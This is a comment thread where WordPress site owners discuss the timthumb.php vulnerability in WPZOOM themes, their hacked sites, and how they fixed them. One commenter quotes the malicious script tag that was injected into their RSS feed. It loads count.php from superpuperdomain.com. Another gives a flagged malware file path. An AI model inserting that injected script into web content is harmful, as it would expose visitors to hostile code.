Thanks Dumitru.
It was just a luck to see your post, so : is there a way to receive all important security fix notices for the template we use?

Thanks again,
Seb.

So updating to the last version of this script, completely protects us from this exploit? I use several of your guys themes and this is concerning. Are their any plans to move to the native Wordpress image resizing function and avoid issues like this altogether? I mean I love what timthumb does, but I love my site more and if it was a bit more work to make things work I would be fine with that. A virus and exploit like this almost took my site out of commission permanently a few years back and I don't want to go through that again.

I also agree with tikann, at a minimum a mass email should go out to all WPZOOM theme owners letting them know that this is the issue and what they should do because it could really damage their site if they don't address this quickly to either prevent or mitigate the threat.

Dumitru,

I understand that and I understand the loss in functionality and understand that there is not really a better solution. I am simply stating that if there is a security flaw in a script that is vital to the majority of your themes, then by association your themes will inherently be vulnerable is all. You guys make beautiful themes, I own several of them. As an IT guy though, one has to be concerned and users just want to know that you guys are doing everything you can to make sure that of all the ways a site could get hacked, your themes aren't easy pickings is all. I want to be clear, I LOVE your themes but as I said before I almost had a site that I had put years of work into destroyed by something like this and it took me over a month to get it eradicated. Just trying to say that this is something that everyone should be concerned about. Thanks for the awesome themes!!

Although it's part of your job to follow up with security issues, I still want to show some appreciation for your speedy job updating the vulnerable files.

Thank you very much vbzoom, next time try to email us ;)

Regards,
Mohammed Jobran

I got hacked by the timthumb.php hackers. I first noticed because my RSS feeds where not validating. Got to this page and enter your feed URL:

http://feedvalidator.org/

Your feed URL would be http://yourdomain.com/feed

If you've been haced your feed will not validate and it will point you to a line at the end of the feed, actually after </feed> it will be a script called from superpuperdomain.com

This is what I did to fix the hack:

http://wordpress.org/support/topic/rss-feed-crash
read the posts by OceansDB

I also updated timthumb.php as Dumitru suggested, just did it too late. But I think I'm good now.

Please send an email to all members regarding this. My site also got attacked because of this vulnerability. But fixed it soon.

My site has also been attacked. Everyone was getting redirected to another site and users anti virus's were picking up this:

File Name: tubedeva.com/enterpoint/enterpoi​​nt.php
Threat Name: exploit javascript obfuscation (type 1466)

Also my feed is not validating anymore either like the guy above said.

EDIT: And yes I have this at the bottom of my feed output:

<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref="></script>

I have replaced the file suggested but my feed is still not validating. How can I fix it?

Also, you say that its mainly the bit about the define version 2.0 but my file already said 2.4 and I have still been hacked so are you sure this is a fix?

Damn, why can't I edit my posts here anymore?

I fixed my feed using the link that was posted above but I am still worried that it could happen again.

Was anything else edited in the timthumb file apart from the define version 2.0 thing?

The reason I say this is because my file already said 2.4 and I was hacked :/

Sorry for all the posts btw. Can't seem to edit/delete my posts...

I would like to check

On the new timthumb.php script in approximately line 20 it says
define ('VERSION', '2.7');

This is where I have to change to 2.0 ?

I didn't think that!

I meant in the NEW script that I have to copy and paste is that the line that I have to change?

____________________________________________________________________
I wrote before "On the new timthumb.php script in approximately line 20 it says define ('VERSION', '2.7');"

I add the new script but here i must change to 2.0